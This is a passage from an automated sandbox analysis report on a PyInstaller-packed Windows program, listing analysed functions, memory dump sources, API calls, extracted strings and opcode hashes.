                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                                              • Opcode ID: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
                                                                                                                                                                                                                                              • Instruction ID: 4ba38de0d793e79f5433e7b1043c8941d3493797251b4406aec5e36ff450be78
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16214D32E0A68685FB64BA25EC453B922E4FF41F54F2C8435DB0E467BDCE3CE9818651
                                                                                                                                                                                                                                              Function 00007FFE0076204A Relevance: 1.3, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                                              • Opcode ID: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
                                                                                                                                                                                                                                              • Instruction ID: 4327385b0712ee5e849ffcd87e15fdd6608e09e515c54a2d0011a2b376ab9afc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1F0FF22B09B8285E704AB16F8042AAA764FB99FC4F5C4035EF8E47BADCF3CD5518704
                                                                                                                                                                                                                                              Function 00007FF6B751D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF6B7510C90,?,?,?,00007FF6B75122FA,?,?,?,?,?,00007FF6B7513AE9), ref: 00007FF6B751D63A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                                              • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                              • Instruction ID: 03153f43d82c1e21f5ae14c97fc931c40e7c8e65b3e43365fdf77f0453d9abc4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06F0F892F0DB9645FE645F79584167512905F847A2F080734DF2EC6AE2EE2CA880A610

                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                              Function 00007FF6B75089E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                              • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                              • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                              • Instruction ID: 0f916afd0678db3eecd8a898f3a7dbc4401063a93fe515aea3663798724dcb29
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AD15E33A0CB8686EB109F78E8546A93771FF94B58F400239DB9E96AB4DF3CE5458740
                                                                                                                                                                                                                                              Function 00007FFE013C42B0 Relevance: 23.2, APIs: 1, Strings: 12, Instructions: 452COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                                                                              • API String ID: 4225454184-1067337024
                                                                                                                                                                                                                                              • Opcode ID: c8a2246b974823a7f9e685c92d7b6b5ea85889c004ad0ed30654c43bd33b2973
                                                                                                                                                                                                                                              • Instruction ID: a962de5e5fe5605f3530c14e721a8488ce97ccc49c9daab3728decf95bf8bc12
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8a2246b974823a7f9e685c92d7b6b5ea85889c004ad0ed30654c43bd33b2973
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0022462E0C68685FF758B2494603797BD1AF62BA4F164235CAAE4B6F1DE3DE441C700
                                                                                                                                                                                                                                              Function 00007FFDFAE63248 Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116621230.00007FFDFAE61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAE60000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116507686.00007FFDFAE60000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAEAA000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAEB8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF07000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF0C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF0F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117242370.00007FFDFAF10000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117294434.00007FFDFAF12000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfae60000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A461ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2528831389-0
                                                                                                                                                                                                                                              • Opcode ID: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
                                                                                                                                                                                                                                              • Instruction ID: a5bc5b172a924cd8e100a5a6971bdeb98b6e9290a7bad0a6227e8595d42127a2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D316D72728B8286EB68AF60E8607ED7360FB94744F00443ADA5E47B99DF39C548CB00
                                                                                                                                                                                                                                              Function 00007FF6B75083C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B750842B
                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084AE
                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084CD
                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084DB
                                                                                                                                                                                                                                              • FindClose.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084EC
                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084F5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                              • String ID: %s\*
                                                                                                                                                                                                                                              • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                              • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                              • Instruction ID: 357850099f2e1e2cd68665016846c1d9ce0cd1ccdab5cdcc1ad199b6742cb407
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1416023E0CA8695EA209F28E4445FA63A0FB9475CF500236EB9DD36E4EF3CE549C741
                                                                                                                                                                                                                                              Function 00007FFE01307336 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 332COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
                                                                                                                                                                                                                                              • API String ID: 0-2031831958
                                                                                                                                                                                                                                              • Opcode ID: 27ee5c829f6d79043f4cbad637b212a471c0560ebe4aff584a080aef168f4e0b
                                                                                                                                                                                                                                              • Instruction ID: 69bb21e3e9fc613ceed0b2a17469c1c75fea8b9000e91a5f4957c4f933bdfc9f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27ee5c829f6d79043f4cbad637b212a471c0560ebe4aff584a080aef168f4e0b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EDD12662B1D68286EB668B59D064B7D7BE5FB44B80F4B4078DE8E4B7A5DE2CE400C700
                                                                                                                                                                                                                                              Function 00007FFE0076212B Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                                              • Opcode ID: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
                                                                                                                                                                                                                                              • Instruction ID: 93c3ade5e0df77667ce2df2b49974f6325261674f4316561062131f68acb318c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A31DB76609A868AEB609F61E8407EE7374FB88744F44443ADB4E47BA9DF3CD648C710
                                                                                                                                                                                                                                              Function 00007FF6B750D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                                              • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                              • Instruction ID: a34d1c2bd872d6ac2a92cb46ed2bb1fcc56650d32559f5c199ae5cbcbeb2ab7c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4231FA73609B8586EB609F64E8807AE6374FB84748F44403ADB4E87BA9EF79D548C710
                                                                                                                                                                                                                                              Function 00007FF6B7525C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525C45
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7525598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B75255AC
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A948: HeapFree.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A948: GetLastError.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A968
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6B751A8DF,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751A909
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6B751A8DF,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751A92E
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525C34
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B75255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B752560C
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525EAA
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525EBB
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525ECC
                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6B752610C), ref: 00007FF6B7525EF3
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4070488512-0
                                                                                                                                                                                                                                              • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                              • Instruction ID: 95f0c04069e4de3d30322c73e55e1f1e83f292b0eeba1eaea1bfc8591df2b883
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1D1AE37F1C25286E7209F2AD8811B96761EF84794F448136EB4EC7AB5EF3CE8518740
                                                                                                                                                                                                                                              Function 00007FF6B751A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                                              • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                              • Instruction ID: 6b311e013661d88019044c8d22ac4984071de2e1b38d022f686d164072ab9c7d
